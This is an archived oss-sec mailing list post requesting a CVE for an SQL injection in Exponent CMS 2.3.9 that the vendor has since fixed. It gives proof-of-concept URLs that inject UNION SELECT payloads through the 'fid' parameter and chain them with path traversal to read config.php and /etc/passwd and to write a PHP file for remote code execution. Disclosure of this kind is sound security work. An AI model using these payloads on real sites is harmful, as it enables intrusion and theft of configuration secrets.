oss-sec mailing list archives
CVE request:Exponent CMS 2.3.9 SQL injection vulnerability
From: felix k3y <felixk3y () gmail com>
Date: Sun, 18 Sep 2016 11:52:58 +0800
Hi , I reported the following SQL Injection vulnerability to the ExponentCMS team on Sep 15, 2016: https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/pixidou/controllers/pixidouController.php#L83-L91 The "fid" parameter fail to sufficiently sanitize before using it in an SQL query, In This vulnerability, also lead to Directory traversal、Remote code execution vulnerabilities etc.. 1) Directory traversal vulnerability http://www.exponentcms.org/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1' union select 1,'./','1.txt',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../framework/conf/config.php 2) Remote code execution i. Upload any legal files through website(.jpg|.gif etc..) ii. copy file to evil file(.php etc..) Proof of concept: http://www.exponentcms.org/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1' union select 1,'./','evil.php',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../../../../../../../etc/passwd And Now, The SQL Injection vulnerability have been fixed. https://exponentcms.lighthouseapp.com/projects/61783/changesets/c1092f167cc6c78dc8bf9bf149946c5219413df3 https://github.com/exponentcms/exponent-cms/commit/c1092f167cc6c78dc8bf9bf149946c5219413df3 Has a CVE been assigned to this issue already? if not I request that one is assigned. thx. -------------------------------------- penghua # silence.com.cn PKAV Team
Current thread:
- CVE request:Exponent CMS 2.3.9 SQL injection vulnerability felix k3y (Sep 17)
- Re: CVE request : Exponent CMS 2.3.9 SQL injection vulnerability cve-assign (Sep 18)